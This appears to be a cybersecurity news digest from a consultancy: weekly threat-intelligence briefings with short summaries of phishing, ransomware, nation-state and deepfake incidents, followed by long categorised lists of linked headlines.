Advancements in AI are significantly lowering the barrier to entry for cyber attackers. As AI-powered attack tools become accessible and packaged as user-friendly products on the dark web, even those without technical expertise can launch sophisticated cyber attacks. This shift greatly widens the pool of potential attackers beyond traditional threats, and highlights that organisations must adopt AI-powered defences to stay ahead. Ethical concerns also arise in deploying AI for cyber security, especially regarding data privacy and automated responses. Over the next five to ten years, AI-driven threats are expected to evolve significantly, introducing entirely new types of attacks.
Cyber Security Trends and Tips for Small and Medium Businesses to Stay Protected
Microsoft highlights that cyber attacks are increasingly affecting SMBs, with 31% having experienced incidents like ransomware and phishing. These attacks cost SMBs up to $7 million, impacting finances and reputation. 94% recognise cyber security’s importance, and over 70% work with specialists to manage their security. AI’s rise increases security needs, with 81% of SMBs acknowledging this. Many SMBs plan to boost cyber security spending; hybrid work also poses challenges, with 68% finding secure data access difficult for remote workers.
What are the key Threats to Global National Security?
A recent analysis identifies cyber security threats as the foremost concern for nations leveraging digital technologies, with cyber attacks increasingly targeting critical infrastructure. Climate change is another pressing issue, causing resource shortages and contributing to conflicts, with over two in five regions facing climate-induced migration. Bioterrorism also poses significant risks, yet nearly a third of countries have not invested adequately in public health preparedness. Economic espionage is impacting key sectors like technology and defence, and the ongoing threat of nuclear proliferation remains a major global security challenge.
Sources:
https://inews.co.uk/inews-lifestyle/public-wifi-wont-want-to-read-3348687
https://uk.pcmag.com/security/155250/new-macos-malware-linked-to-north-korean-hackers
https://www.techspot.com/news/105399-ransomware-attacks-set-rise-record-levels-2024-despite.html
https://cyberscoop.com/china-apt-eset-target-typhoon-mirrorface/
https://cyberscoop.com/cybersecurity-for-startups-early-stage-companies/
https://www.helpnetsecurity.com/2024/11/07/buzz-hillestad-prismatic-ai-driven-attacks/
https://www.itsecurityguru.org/2024/11/01/what-are-the-key-threats-to-global-national-security/
Governance, Risk and Compliance
7 cyber security trends for small and medium businesses | Microsoft Security Blog
CISO Top 10 Priorities for Q3 2024: Navigating Cyber Security's Evolving Challenges | SC Media
Disaster recovery planning is key in the modern-day business environment
Cyber security in crisis: Are we ready for what's coming? - Help Net Security
IT Security Centralization Makes Industrial Spies Profitable
How Cyber Security Training Must Adapt to a New Era of Threats - Security Boulevard
Chief risk storyteller: How CISOs are developing yet another skill | CSO Online
Threats
Ransomware, Extortion and Destructive Attacks
Cyber insurers would not welcome ban on ransomware payments :: Insurance Day
GoZone ransomware accuses and threatens victims - Help Net Security
RansomHub dethrones LockBit as top ransomware cartel | Cybernews
Iranian Threat Actors Ramp Up Ransomware, Cyber Activity
Ransomware attacks caused prolonged disruptions in October | TechTarget
Police Doxing of Criminals Raising Ransomware-Attack Stakes
Meet Interlock — The new ransomware targeting FreeBSD servers
Cyber attack disrupts classes at Irish technology university
Ransomware Victims
Devon school 'blackmailed' by hackers in cyber-attack - BBC News
Schneider Electric attackers demand ransom paid in baguettes • The Register
Ransomware Group Demands Payment in French Baguettes
Ransomware Attack Disrupts Georgia Hospital's Access to Health Records - SecurityWeek
Hacker Claims to Leak Nokia Source Code - InfoRiskToday
California court suffering from tech outages after cyber attack
Ransomware attack costs Microchip Technology over $21M | SC Media
Phishing & Email Based Attacks
Businesses Worldwide Targeted in Large-Scale ChatGPT Phishing Campaign - SecurityWeek
Dangerous new phishing campaign infects Windows devices with malicious Linux VM | TechRadar
Beware of phishing emails delivering backdoored Linux VMs! - Help Net Security
Fake Copyright Infringement Emails Spread Rhadamanthys
US Sentences Nigerian to 26 Years in Prison for Stealing Millions Through Phishing - SecurityWeek
DocuSign's Envelopes API abused to send realistic fake invoices
Cyber Criminals Exploit DocuSign APIs to Send Fake Invoices - Infosecurity Magazine
Large-Scale Phishing Campaign Exposed Using New Version Of Rhadamanthys Malware
Phishing Emails and Spam Are Similar, but There Are 5 Key Differences
Gmail Users Beware—Link Hovering Attacks On The Up
Gmail 2FA Cyber Attacks—Open Another Account Before It’s Too Late
Scammers Target Starlink Users With Elaborate Phishing Scheme
Other Social Engineering
LastPass warns of fake support centers trying to steal customer data
Fake Copyright Infringement Emails Spread Rhadamanthys
Malware operators use copyright notices to lure in businesses | SC Media
Advanced Variant Of FakeCall Malware Targets Mobile Users
FBI recovers just $8M after crypto scam crashes Kansas bank • The Register
Things you should know about ‘digital arrest’ scams! - The Hindu BusinessLine
Artificial Intelligence
The deepfake threat to CEOs | Fortune
How AI will shape the next generation of cyber threats - Help Net Security
Businesses Worldwide Targeted in Large-Scale ChatGPT Phishing Campaign - SecurityWeek
Experts warn some ChatGPT models can be hacked to launch deepfake scams | TechRadar
ChatGPT-4o can be used for autonomous voice-based scams
AI threats dictate a return to Human Intelligence | Cybernews
Defenders Outpace Attackers in AI Adoption - Infosecurity Magazine
OWASP Releases AI Security Guidance
Why Cyber Criminals Are Not Necessarily Embracing AI | HackerNoon
Inside Iran's Cyber Playbook: AI, Fake Hosting, and Psychological Warfare
Trump plans to dismantle Biden AI safeguards after victory - Ars Technica
2FA/MFA
Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine
Gmail 2FA Cyber Attacks—Open Another Account Before It’s Too Late
Malware
New Malware Campaign Targets Windows Users Through Gaming Apps
Hackers increasingly use Winos4.0 post-exploitation kit in attacks
Industrial companies in Europe targeted with GuLoader - Help Net Security
5 Most Common Malware Techniques in 2024
MacOS under attack by crypto thieves: malicious app disguises itself as PDF | Cybernews
New SteelFox malware hijacks Windows PCs using vulnerable driver
New MacOS Malware Linked to North Korean Hackers
Microsoft services exploited for stealthy malware deployment | SC Media
Large-Scale Phishing Campaign Exposed Using New Version Of Rhadamanthys Malware
Typosquat campaign impersonates 287+ popular npm packages • The Register
Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT - Check Point Research
Bots/Botnets
Microsoft reveals major Chinese botnet is attacking users across the world | TechRadar
Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media
Organisations are fighting a losing battle against advanced bots | TechRadar
Mobile
Advanced Variant Of FakeCall Malware Targets Mobile Users
New Android Banking Malware 'ToxicPanda' Targets Users with Fraudulent Money Transfers
Dangerous Android banking malware looks to trick victims with fake money transfers | TechRadar
Here's What I Do Whenever I Receive a Scam Message on WhatsApp
What Telegram’s recent policy shift means for cyber crime
Mobile & IoT Security Requires More Industry Attention
How I Spot Smishing Texts Easily (and You Can, Too)
Denial of Service/DoS/DDoS
UK Council Sites Recover Following Russian DDoS Blitz - Infosecurity Magazine
DDoS site Dstat.cc seized and two suspects arrested in Germany
UK councils bat away DDoS barrage from Putin fanboys • The Register
Cyber attack disrupts classes at Irish technology university
Internet of Things – IoT
IoT Security Failures Can Be Sh*tty - Security Boulevard
Iranian APT Targets IP Cameras, Extends Attacks Beyond Israel
Chinese Air Fryers May Be Spying on Consumers, Which? Warns - Infosecurity Magazine
Mobile & IoT Security Requires More Industry Attention
Data Breaches/Leaks
Recovering From a Breach: 4 Steps Every Organisation Should Take - Security Boulevard
Telecoms company Magnet+ investigating possible cyber attack – The Irish Times
Identity-related data breaches cost more than average incidents - Help Net Security
Nokia investigates breach after hacker claims to steal source code
Scissor-maker Fiskars sliced by hackers | Cybernews
Domestic abuse victim’s home address leaked to ex-partner after data breach | The Independent
210,000 Impacted by Saint Xavier University Data Breach - SecurityWeek
Organised Crime & Criminal Actors
Operation Synergia II sees Interpol swoop on cyber crims • The Register
Massive Nigerian Cyber Crime Bust Sees 130 Arrested - Infosecurity Magazine
Interpol operation nets 41 arrests, takedown of 22,000 malicious IPs
Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum
The biggest underestimated security threat of today? Advanced persistent teenagers | TechCrunch
Inside the Massive Crime Industry That’s Hacking Billion-Dollar Companies | WIRED
Hacker Said to Be Behind Breach of Snowflake (SNOW) Customers Arrested - Bloomberg
How to Defend Against Alleged Snowflake Attacker… | Intel 471
What Telegram’s recent policy shift means for cyber crime
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
MacOS under attack by crypto thieves: malicious app disguises itself as PDF | Cybernews
FBI recovers just $8M after crypto scam crashes Kansas bank • The Register
Insider Risk and Insider Threats
FBI arrested former Disney World employee for hacking computer menus and mislabeling allergy info
Oh, the Humanity! How to Make Humans Part of Cyber Security
Insurance
Cyber insurers would not welcome ban on ransomware payments :: Insurance Day
Supply Chain and Third Parties
Banks urged to improve resilience to IT meltdowns • The Register
Supply Chain Attack Uses Smart Contracts for C2 Ops - Infosecurity Magazine
New Report from BlueVoyant Shows Progress in Third-Party Cyber Risk Management, But Breaches Persist
The State of Supply Chain Defence in 2024 Report
Serco, DHL among firms affected by Microlise cyber attack | ITPro
Cloud/SaaS
The future of cloud computing: Top trends and predictions | TechTarget
5 SaaS Misconfigurations Leading to Major Fu*%@ Ups
Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine
Microsoft 365 security blind spots: Is your business exposed? - Partner Content - Security - iTnews
Outages
Banks urged to improve resilience to IT meltdowns • The Register
Identity and Access Management
Identity-related data breaches cost more than average incidents - Help Net Security
Encryption
“Q Day” Is Coming: Is the World Prepared? - Centre for International Governance Innovation
Quantum Has Landed, So Now What?
Linux and Open Source
Dangerous new phishing campaign infects Windows devices with malicious Linux VM | TechRadar
Beware of phishing emails delivering backdoored Linux VMs! - Help Net Security
Meet Interlock — The new ransomware targeting FreeBSD servers
Passwords, Credential Stuffing & Brute Force Attacks
Microsoft Warns of Chinese Botnet Exploiting Router Flaws for Credential Theft
Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media
A Hacker's Guide to Password Cracking
Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online
Social Media
South Korea fines Meta about $15 mln over collection of user data | Reuters
Canada Orders TikTok to Shut Down Canadian Operations Over Security Concerns
Malvertising
NCSC Publishes Tips to Tackle Malvertising Threat - Infosecurity Magazine
Training, Education and Awareness
How Cyber Security Training Must Adapt to a New Era of Threats - Security Boulevard
Regulations, Fines and Legislation
Banks urged to improve resilience to IT meltdowns • The Register
The NIS 2 Era Is Here: Are You Compliance-Ready? | Goodwin - JDSupra
Government-backed cyber security has a long way to go, warns Arctic Wolf
Apple could face EU's first-ever DMA fine as soon as this month - 9to5Mac
Exploring DORA: How to manage ICT incidents and minimize cyber threat risks
HIPAA Not ‘Strong Enough’ for Health Care’s Cyber Security Needs
South Korea fines Meta about $15 mln over collection of user data | Reuters
Biden administration prepares second executive order on cyber security | SC Media
Germany drafts law to protect researchers who find security flaws
Trump plans to dismantle Biden AI safeguards after victory - Ars Technica
Combating Cyber Crime: What to Expect From Trump Presidency?
Models, Frameworks and Standards
The NIS 2 Era Is Here: Are You Compliance-Ready? | Goodwin - JDSupra
Exploring DORA: How to manage ICT incidents and minimize cyber threat risks
OWASP Releases AI Security Guidance
NIST CSF 2.0 Critical - Security Boulevard
Data Protection
Consumer privacy risks of data aggregation: What should organisations do? - Help Net Security
South Korea fines Meta about $15 mln over collection of user data | Reuters
Careers, Working in Cyber and Information Security
24% of CISOs actively looking to leave their jobs | CSO Online
A grassroots movement to tackle cyber skills gap | Professional Security Magazine
UK Cyber Security Wages Soar Above Inflation as Stress Levels Rise - Infosecurity Magazine
Proactive Ways To Bridge The Cyber Security Talent Gap
How Playing Cyber Games Can Help You Get Hired
Keep Learning or Keep Losing: There's No Finish Line
US Coast Guard's New Cyber Units: A Game Changer for National Security - ClearanceJobs
Want to attract diverse cyber talent? Go beyond the same-old recruiting techniques | SC Media
MoD seeks leader for ‘defensive cyber operations’ – PublicTechnology
How CISOs can turn around low-performing cyber pros | CSO Online
Law Enforcement Action and Take Downs
FBI arrested former Disney World employee for hacking computer menus and mislabeling allergy info
Operation Synergia II sees Interpol swoop on cyber crims • The Register
Massive Nigerian Cyber Crime Bust Sees 130 Arrested - Infosecurity Magazine
Interpol operation nets 41 arrests, takedown of 22,000 malicious IPs
DDoS site Dstat.cc seized and two suspects arrested in Germany
FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions
Hacker Said to Be Behind Breach of Snowflake (SNOW) Customers Arrested - Bloomberg
How to Defend Against Alleged Snowflake Attacker… | Intel 471
Gov't IT contractors arrested for defrauding the feds • The Register
US Sentences Nigerian to 26 Years in Prison for Stealing Millions Through Phishing - SecurityWeek
FBI recovers just $8M after crypto scam crashes Kansas bank • The Register
Police Doxing of Criminals Raising Ransomware-Attack Stakes
Misinformation, Disinformation and Propaganda
Russian disinformation campaign active ahead of 2024 US election
US Says Russia Behind Fake Haitian Voters Video - Infosecurity Magazine
CISA: U.S. election disinformation peddled at massive scale | TechTarget
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
US warns of Russia and Iran’s disinformation campaigns as election day unfolds
False bomb threats only blemish on Election Day voting process
Russian Fake News and Bomb Threats Target Election Day Votes
Here are the post-election disinfo threats experts are watching for
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
IT Security Centralization Makes Industrial Spies Profitable
The West must respond to Russia’s rapidly escalating hybrid warfare - Atlantic Council
What are the key Threats to Global National Security? - IT Security Guru
Lord Harries links nuclear to cyber threats
Nation State Actors
Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum
China
Microsoft reveals major Chinese botnet is attacking users across the world | TechRadar
Microsoft Warns of Chinese Botnet Exploiting Router Flaws for Credential Theft
Chinese APTs Cash In on Years of Edge Device Attacks
Thousands of hacked TP-Link routers used in years-long account takeover attacks - Ars Technica
Sophos Warns Chinese Hackers Are Becoming Stealthier - Infosecurity Magazine
NCSC Details ‘Pygmy Goat’ Backdoor Planted on Hacked Sophos Firewall Devices - SecurityWeek
Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media
China's elite hackers expand target list to European Union | CyberScoop
China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
China's Volt Typhoon breached Singtel, reports say • The Register
Chinese Group Accused of Hacking Singtel in Telecom Attacks - Bloomberg
FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions
Chinese Air Fryers May Be Spying on Consumers, Which? Warns - Infosecurity Magazine
Canada Orders TikTok to Shut Down Canadian Operations Over Security Concerns
Russia
The West must respond to Russia’s rapidly escalating hybrid warfare - Atlantic Council
N Korea may receive tech in exchange for military support • The Register
CISA: US election disinformation peddled at massive scale | TechTarget
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
Cyber attack sparks extra security at Portsmouth council - BBC News
UK Council Sites Recover Following Russian DDoS Blitz - Infosecurity Magazine
Russian disinformation campaign active ahead of 2024 US election
US Says Russia Behind Fake Haitian Voters Video - Infosecurity Magazine
False bomb threats only blemish on Election Day voting process
Russian Fake News and Bomb Threats Target Election Day Votes
Here are the post-election disinfo threats experts are watching for
Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum
1 Million Cyber Attacks Made On Montco Election, Mainly From Russia | Norristown, PA Patch
Iran
CISA: U.S. election disinformation peddled at massive scale | TechTarget
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
Iranian Threat Actors Ramp Up Ransomware, Cyber Activity
Iranian APT Targets IP Cameras, Extends Attacks Beyond Israel
Here are the post-election disinfo threats experts are watching for
Inside Iran's Cyber Playbook: AI, Fake Hosting, and Psychological Warfare
North Korea
N Korea may receive tech in exchange for military support • The Register
Tools and Controls
Banks urged to improve resilience to IT meltdowns • The Register
Disaster recovery planning is key in the modern-day business environment
AI threats dictate a return to Human Intelligence | Cybernews
What is Unified Threat Management (UTM)? | Definition from TechTarget
Recovering From a Breach: 4 Steps Every Organisation Should Take - Security Boulevard
Google Says Its AI Found SQLite Vulnerability That Fuzzing Missed - SecurityWeek
Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine
New cyber security advisory highlights defence-in-depth strategies
Oh, the Humanity! How to Make Humans Part of Cyber Security
How to Win at Cyber by Influencing People
Security Assessment Reports: A Complete Overview - Security Boulevard
The human factor in cyber resilience | UKAuthority
Typosquat campaign impersonates 287+ popular npm packages • The Register
Scotland’s Digital Office highlights tabletop cyber security exercises | UKAuthority
Defenders Outpace Attackers in AI Adoption - Infosecurity Magazine
4 Main API Security Risks Organisations Need to Address
The ins and outs of threat emulation | TechRadar
Navigating the evolving landscape of cyber risk management
Germany drafts law to protect researchers who find security flaws
What is a Cyber Range? - Security Boulevard
Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online
Effective Phishing Exercises: How To Plan, Execute And Follow Up
Microsoft 365 security blind spots: Is your business exposed? - Partner Content - Security - iTnews
Other News
Cyber security in crisis: Are we ready for what's coming? - Help Net Security
CISO Top 10 Priorities for Q3 2024: Navigating Cyber Security's Evolving Challenges | SC Media
The ironic vulnerability: why insurers are prime targets for cyber attacks
Cyber attack disrupts classes at Irish technology university
Public sector cyber break-ins: Our money, our right to know • The Register
'Unauthorized activity' downs Washington's court systems • The Register
The Internet's Defenders Are Running Out of Money—And We're All at Risk | IBTimes
How to Win at Cyber by Influencing People
Scotland’s Digital Office highlights tabletop cyber security exercises | UKAuthority
How early-stage companies can go beyond cyber security basics | CyberScoop
How to Outsmart Stealthy E-Crime and Nation-State Threats
Cyber Trends: Keep an Eye on Critical Infrastructure Sectors
Five ways cyber criminals target healthcare and how to stop them | ITPro
JPMorgan CISO says three trends play a role in how he protects the banking giant | Fortune
Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems
Don't search for information on cats at work — you could be at risk of being hacked | TechRadar
Combating Cyber Crime: What to Expect From Trump Presidency?
Facing Growing Threats, Space Industry Expands Its Cyber Warning Center
Governments are facing a huge surge in cyber attacks | TechRadar
Cyber Threats That Could Impact the Retail Industry This Holiday Season (and What to Do About It)
Cyber attack on American Water: A warning to critical infrastructure
Vulnerability Management
Vulnerabilities
Microsoft SharePoint RCE bug exploited to breach corporate network
Worrying WordPress plugin security flaw could let hackers hijack your site | TechRadar
Okta vulnerability allowed accounts with long usernames to log in without a password
New SteelFox malware hijacks Windows PCs using vulnerable driver
Sophos Firewall hack on government network used an all-new custom malware | TechRadar
Cisco scores an (im)perfect CVSS 10 with critical Wi-Fi flaw • The Register
CISA warns of critical Palo Alto Networks bug exploited in attacks
Zero-Click Flaw Exposes Potentially Millions of Popular Storage Devices to Attack | WIRED
PfSense Stored XSS Vulnerability Leads To RCE Attacks, PoC Published
Synology Urges Patch for Critical Zero-Click RCE Flaw Affecting Millions of NAS Devices
Google Patches Two Android Vulnerabilities Exploited in Targeted Attacks - SecurityWeek
Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 01 November 2024
Black Arrow Cyber Threat Intelligence Briefing 01 November 2024:
-Banks and Regulators Warn of Rise in ‘Quishing’ QR Code Scams
-Russia Carrying Out Targeted Attacks In UK, Microsoft Warns
-Spoof Eventbrite Phishing Emails Lure in Victims in Major Attack
-Business Email Compromise Scams Dominate Q3 2024 Threats
-This Nasty Android Trojan is Hijacking Calls to Your Bank and Sending Them to Hackers
-What Military Wargames Can Teach About Cyber Security
-Businesses Expect Cyber Threats to Rise, but Aren’t Ready for Them
-The Overlooked Importance of Identifying the Riskiest Users
-Hackers Targeted a $12 Billion Cyber Security Company with a Deepfake of Its CEO. Here's Why Small Details Made It Unsuccessful.
-Small Businesses Boosting Cyber Security as Threats Grow
-The Rise of the vCISO: From Niche to Necessity?
-Five Eyes Agencies Offer Security Advice for Small Businesses
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Banks and Regulators Warn of Rise in ‘Quishing’ QR Code Scams
Banks and regulators have flagged a concerning rise in "quishing" scams, where fraudsters use QR codes in emails to bypass corporate cyber security. This technique, involving QR codes in PDF attachments, often evades standard security filters, tricking recipients into disclosing financial details. Increased during the pandemic, such scams now represent over 20% of UK online scams, with reports doubling in the past year. While these scams frequently occur via email, they also target public QR code installations, from parking meters to EV chargers. As quishing continues to evolve, organisations may need to enhance detection capabilities to counter this growing threat.
Russia Carrying Out Targeted Attacks In UK, Microsoft Warns
Microsoft and AWS have issued warnings about targeted cyber attacks by a Russian-backed group, aimed primarily at the UK and other countries. Known as Midnight Blizzard or APT29, this group has been using highly targeted spear-phishing emails since October to infiltrate government, defence, academic, and non-profit sectors. Posing as Microsoft or AWS staff, attackers use social engineering techniques involving remote access protocol attachments that create direct connections to attacker-controlled servers. This method can expose user credentials and facilitate unauthorised access to sensitive information, including device resources, potentially allowing attackers to install persistent malware on compromised systems.
Spoof Eventbrite Phishing Emails Lure in Victims in Major Attack
Cyber criminals have increasingly exploited Eventbrite’s platform, with a 900% surge in phishing attacks using this trusted event management service. Hackers create fake events under familiar brand names, leveraging Eventbrite's built-in mailing system to distribute phishing emails that bypass common security filters due to the trusted domain of ‘noreply@events.eventbrite.com’. Through these messages, victims are urged to take immediate action, often leading to the disclosure of sensitive data like login credentials, tax identification numbers, and payment details. This method has proven effective, highlighting the need for heightened vigilance around trusted online platforms.
Business Email Compromise Scams Dominate Q3 2024 Threats
The VIPRE Security Group’s recent report highlights the increasing sophistication of Business Email Compromise (BEC) scams, which accounted for 58% of phishing attempts and heavily relied on impersonating authority figures such as CEOs and IT staff, representing 89% of these attacks. Techniques like URL redirection and harmful attachments disguised as critical documents have increased, underscoring the need for robust cyber security measures and employee awareness, especially approaching the holiday season.
This Nasty Android Trojan is Hijacking Calls to Your Bank and Sending Them to Hackers
A recent report highlights a sophisticated threat from the Android-based FakeCall trojan, which intercepts sensitive calls by replacing the phone’s default dialler. This malicious software enables hackers to hijack both incoming and outgoing calls, allowing them to impersonate bank staff and gather sensitive data from unsuspecting users. FakeCall is distributed through malicious apps that exploit Android’s accessibility features. Since its detection in 2022, FakeCall has expanded its reach, now able to mimic over 20 financial organisations. This trojan's continuous development, including screen streaming and screenshot capabilities, points to its evolving potency.
What Military Wargames Can Teach About Cyber Security
Tabletop wargaming has become an essential tool in cyber security, helping organisations prepare for the swift, critical decisions required in the first 24-48 hours of a ransomware attack. Despite the widespread use of technologies to prevent cyber attacks, 2024 has seen an increase in ransomware and data breaches, exposing gaps in many companies' response capabilities. By simulating realistic ransomware scenarios, tabletop exercises enable organisations to stress-test response strategies, address compliance gaps, and refine their disaster recovery plans. This hands-on approach enhances organisational resilience, ensuring leadership and cross-functional teams are equipped for effective incident response and secure recovery. Black Arrow Cyber Consulting provides proctored tabletop cyber incident response exercises, enabling firms to better handle and recover from cyber incidents.
Businesses Expect Cyber Threats to Rise, but Aren’t Ready for Them
Recent research indicates UK businesses are increasingly concerned about cyber threats, with 75% of companies reporting a rise in attempted attacks and nearly 40% experiencing a successful breach. Despite these concerns, only 35% of leaders feel adequately prepared to handle cyber incidents. This gap between awareness and readiness highlights the need for robust, proactive security measures, especially as the UK emerges as the most targeted country in Europe. As organisations recognise the strategic value of cyber security, embedding it into decision-making becomes essential to protect against evolving digital risks and ensure future resilience.
The Overlooked Importance of Identifying the Riskiest Users
Reach Security highlights the significance of identifying and managing the riskiest users within an organisation. Their findings indicate that 80% to 90% of cyber security threats are linked to just 3% to 5% of users, with 20% of these high-risk individuals changing each month. Implementing a "see one, do one, teach one" model, similar to healthcare’s incremental learning, can empower high-risk users to understand and mitigate specific threats. This approach helps organisations allocate resources more effectively, reduce dependency on numerous security tools, and foster a more resilient cyber security culture by enabling high-risk users to act as advocates within the organisation.
Hackers Targeted a $12 Billion Cyber Security Company with a Deepfake of Its CEO. Here's Why Small Details Made It Unsuccessful.
A recent incident involving $12 billion cyber security firm Wiz highlights the growing threat of deepfake scams targeting top executives. Hackers attempted to use an audio deepfake of Wiz’s CEO, Assaf Rappaport, to steal employee credentials, aiming to access the firm’s internal systems and data. The attempt failed because employees recognised the CEO’s distinct speech patterns. Deepfake scams are increasingly sophisticated, with recent reports indicating that half of global companies have faced such attacks, and 66% of business leaders see deepfakes as a serious risk to their organisations.
Small Businesses Boosting Cyber Security as Threats Grow
The Identity Theft Resource Center’s latest report highlights that small businesses are increasingly bolstering their cyber security efforts in response to growing identity-related cyber attacks. Over 80% of small businesses reported experiencing a cyber attack or data breach in the past year with financial losses exceeding $500,000, in some cases doubling. In response, many small businesses are ramping up investment in security tools, staff training, and vendor checks. Additionally, as new state privacy laws emerge, over 75% of small business leaders express concern about compliance, spurring increased focus on data protection practices.
The Rise of the vCISO: From Niche to Necessity?
The rise of virtual Chief Information Security Officers (vCISOs) highlights a shift in cyber security for small and medium-sized businesses (SMBs). With cyber threats evolving rapidly, vCISOs offer flexible, high-level security expertise that strengthens defences while remaining cost-effective. vCISOs help organisations navigate complex regulatory requirements and manage emerging technologies, such as IoT and machine learning, ensuring a tailored security approach that promotes resilience and business growth. Speak to Black Arrow about our fully scalable and flexible vCISO service to help organisations of all sizes and sectors.
Five Eyes Agencies Offer Security Advice for Small Businesses
The Five Eyes alliance, composed of intelligence agencies from the US, UK, Canada, Australia, and New Zealand, has issued new security guidelines to support small businesses, especially tech firms, in defending against cyber attacks. These guidelines focus on safeguarding intellectual property from sophisticated state-backed actors, such as China, as well as criminal groups and competitors. Recommendations include appointing dedicated security managers, keeping a comprehensive asset inventory, and managing data access with third-party partners. This coordinated effort aims to strengthen business security globally, reducing vulnerabilities across both private and public sectors.
Sources:
https://www.ft.com/content/8aca741e-6448-4511-a54d-64f3a97747b1
https://www.silicon.co.uk/security/microsoft-aws-attacks-russia-586762
https://securitybrief.co.nz/story/business-email-compromise-scams-dominate-q3-2024-threats
https://www.techradar.com/pro/businesses-expect-cyber-threats-to-rise-but-arent-ready-for-them
https://securityboulevard.com/2024/10/small-businesses-boosting-cybersecurity-as-threats-grow-itrc/
https://www.csoonline.com/article/3595617/the-rise-of-the-vciso-from-niche-to-necessity.html
https://www.scworld.com/news/five-eyes-agencies-offers-security-advice-for-small-businesses
Governance, Risk and Compliance
The 10 biggest issues CISOs and cyber teams face today | CSO Online
Businesses expect cyber threats to rise, but aren’t ready for them | TechRadar
Most companies are bracing for a cyber attack within a year
For a Stronger Security Culture, Replace Sticks With Carrots
The rise of the vCISO: From niche to necessity? | CSO Online
Security outsourcing on the rise as CISOs seek cyber relief | CSO Online
Small Businesses Boosting Cyber Security as Threats Grow: ITRC - Security Boulevard
The State of Cyber Security: Challenges, Priorities and Insights - Infosecurity Magazine
CISOs as Organisational Bridge Builders for Cyber Security Culture | HackerNoon
13 Cyber Crime Facts That Will Give You Chills | HackerNoon
A Halloween Haunting: Unveiling Cyber Security’s Scary Stats
Terrifying Trends in the 2024 Cyber Threat Landscape - Security Boulevard
Spooky Cyber Stats and Trends in Time for Halloween
Five Eyes agencies offer security advice for small businesses | SC Media
Security priorities emphasize CISO role on the rise | CSO Online
Three quarters of businesses report rise in cyber attacks
Is Your Business Truly Safe From Risk? | Entrepreneur
What Military Wargames Can Teach Us About Cyber Security
NCSC warns of gap between threats and defence capabilities
99% of CISOs work extra hours every week - Help Net Security
How CIOs and CISOs can partner to improve workforce productivity and security | CIO
The Power of Proactive Risk Assessments in Cyber Security - Security Boulevard
Threats
Ransomware, Extortion and Destructive Attacks
Black Basta ransomware poses as IT support on Microsoft Teams to breach networks
In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail
Black Basta Ransomware Operators Using Microsoft Teams To Breach Organisations
Fog ransomware targets SonicWall VPNs to breach corporate networks
Patched SonicWall critical vulnerability still used in several ransomware attacks | CSO Online
Black Basta operators phish employees via Microsoft Teams - Help Net Security
North Korean govt hackers linked to Play ransomware attack
Three common privilege access mistakes that can lead to a ransomware incident | SC Media
Russia sentences REvil ransomware members to over 4 years in prison
Massive PSAUX ransomware attack targets 22,000 CyberPanel instances
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Ransomware hits web hosting servers via vulnerable CyberPanel instances - Help Net Security
The ransomware negotiation playbook adds new chapters | CSO Online
Ransomware Victims
OnePoint Patient Care Data Breach Exposes 795,000 Records
Atende refused to pay the ransom, and now pays the price | CSO Online
Interbank confirms data breach following failed extortion, data leak
Ransomware hits web hosting servers via vulnerable CyberPanel instances - Help Net Security
Phishing & Email Based Attacks
Cyber Scams & Why We Fall for Them - Security Boulevard
BEC cyber attacks have the highest financial impact - Digital Journal
Business Email Compromise scams dominate Q3 2024 threats
The Weapon of Choice of Cyber Criminals: BEC Impersonation
Spoof Eventbrite phishing emails look to lure in victims in major attack | TechRadar
Threat actors are stepping up their tactics to bypass email protections - Help Net Security
Black Basta operators phish employees via Microsoft Teams - Help Net Security
Phishers reach targets via Eventbrite services - Help Net Security
Spooky Spam, Scary Scams: Halloween Threats Rise - Security Boulevard
